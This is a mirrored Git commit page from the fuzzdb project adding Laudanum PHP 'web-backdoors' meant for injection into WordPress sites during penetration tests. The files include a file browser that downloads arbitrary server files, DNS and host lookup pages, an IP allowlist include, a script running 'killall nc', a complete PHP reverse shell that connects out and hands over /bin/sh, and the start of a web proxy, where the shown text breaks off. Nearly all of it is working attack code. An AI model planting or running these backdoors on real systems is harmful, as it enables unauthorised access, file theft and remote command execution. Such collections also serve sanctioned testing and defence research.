Mirrors/fuzzdb
2
0
Fork 0
mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-09-20 06:01:57 +00:00
Code Issues Projects Releases Packages Wiki Activity

Added files via upload

Browse source
This commit is contained in:
Adam Muntner 2016-03-09 19:27:58 -05:00
parent 1162ef5379
commit a10dc295fd
9 changed files with 1602 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

144
web-backdoors/wordpress/templates/dns.php Normal file
View file

@ -0,0 +1,144 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP DNS Access</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>DNS Query 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<fieldset>
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
<?php
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
if (!in_array($type, array_keys($types))) {
$type = "ANY";
}
$validtype = 0;
foreach (array_keys($types) as $t) {
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
}
?>
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<?php
if ($query != '')
{
$result = dns_get_record($query, $types[$type], $authns, $addtl);
echo "<pre><results>";
echo "Result = ";
print_r($result);
echo "Auth NS = ";
print_r($authns);
echo "Additional = ";
print_r($addtl);
echo "</results></pre>";
}
?>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

182
web-backdoors/wordpress/templates/file.php Normal file
View file

@ -0,0 +1,182 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com>
***
*** 12/28/2013 - updated by Jason Gillam <jgillam@secureideas.com> - fixed parent folder.
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP File Browser</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
//set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
$file = isset($_GET["file"]) ? $_GET["file"] : "";
if ($file != "") {
if(file_exists($file)) {
$s = split("/", $file);
$filename = $s[count($s) - 1];
header("Content-type: application/x-download");
header("Content-Length: ".filesize($file));
header("Content-Disposition: attachment; filename=\"".$filename."\"");
readfile($file);
die();
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum File Browser</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
</script>
</head>
<body onload="init()">
<h1>Laudanum File Browser 0.1</h1>
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
<?php
// get the actual path, add an ending / if necessary
$curdir = realpath($dir);
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
$dirs = split("/",$curdir);
// Create the breadcrumb
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
$breadcrumb = '/';
foreach ($dirs as $d) {
if ($d != '') {
$breadcrumb .= $d . "/";
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
}
}
echo "</h2>";
// translate .. to a real dir
$parentdir = "";
for ($i = 0; $i < count($dirs) - 2; $i++) {
$parentdir .= $dirs[$i] . "/";
}
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
$listingdirs = array();
if ($handle = @opendir($curdir)) {
while ($o = readdir($handle)) {
if ($o == "." || $o == "..") continue;
if (@filetype($curdir . $o) == "dir") {
$listingdirs[] = $o . "/";
}
else {
$listingfiles[] = $o;
}
}
@natcasesort($listingdirs);
@natcasesort($listingfiles);
//display directories
foreach ($listingdirs as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
}
//display files
foreach ($listingfiles as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
}
}
else {
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
}
?>
</table>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

126
web-backdoors/wordpress/templates/host.php Normal file
View file

@ -0,0 +1,126 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a host lookup by ip address.
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Hostname by IP Lookup</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Host Lookup</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>Host Lookup 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<fieldset>
<legend>Host Lookup:</legend>
<p>IP:<input name="query" type="text">
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<?php
if ($query != '')
{
$result = gethostbyaddr($query);
echo "<pre><results>";
echo "Result = ";
print_r($result);
echo "</results></pre>";
}
?>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

61
web-backdoors/wordpress/templates/ipcheck.php Normal file
View file

@ -0,0 +1,61 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
*** by someone other than the person who uploaded Laudanum. This file should be included
*** in other Laudanum tools and not called directly.
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1");
# *********** No editable content below this line **************
$wpl_allowed = 0;
foreach ($wpl_allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$wpl_allowed = 1;
}
if ($wpl_allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
?>

103
web-backdoors/wordpress/templates/killnc.php Normal file
View file

@ -0,0 +1,103 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file attempts to kill all netcat processes spawned by the current user.
*** This may be useful in cases where a reverse shell attempt has gone wrong.
***
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Hostname by IP Lookup</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Kill nc</title>
<link rel="stylesheet" href="style.css" type="text/css">
</head>
<body>
<h1>Kill nc 0.1</h1>
<?php echo exec('killall nc');?>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

194
web-backdoors/wordpress/templates/php-reverse-shell.php Normal file
View file

@ -0,0 +1,194 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = isset($_POST['ip']) ? $_POST['ip'] : '10.2.2.1';
//$ip = '10.2.2.1'; // CHANGE THIS
//$port = 8888; // CHANGE THIS
$port = isset($_POST['port']) ? $_POST['port'] : '8888';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

336
web-backdoors/wordpress/templates/proxy.php Normal file
View file

@ -0,0 +1,336 @@
<?php
ini_set('session.use_cookies', '0');
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file acts as a browser-based proxy.
*** Written by Tim Medin <tim@counterhack.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Proxy</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; }
return $o;
}
function buildurl ($u) {
// build the url from the url array
// this is used because the built in function isn't
// avilable in all installs of php
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s;
}
function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir?
// assume if there is a . it is a file
// if it ends in a / then it is a dir
// if neither, than assume dir
$dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last));
}
$s .= $path;
return $s;
}
function getfilename ($u) {
// returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]);
return $s[count($s) - 1];
}
function getcontenttype ($headers) {
// gets the content type
foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0];
}
}
}
function getcontentencoding ($headers) {
foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0];
}
}
}
function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
unset($headers[$key]);
return $headers;
}
}
}
function rewritecookies($headers) {
// removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
}
}
return $headers;
}
function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0];
}
return "0";
}
function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10;
$flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen;
}
if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 )
$i = $i + 2;
}
return @gzinflate( substr($gzData, $i, -8) );
} else {
return false;
}
return false;
}
function rewrite ($d, $u) {
$r = $d;
//rewrite images and links - absolute reference
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r;
}
/* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
}
if ($url == "") {
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Proxy</title>
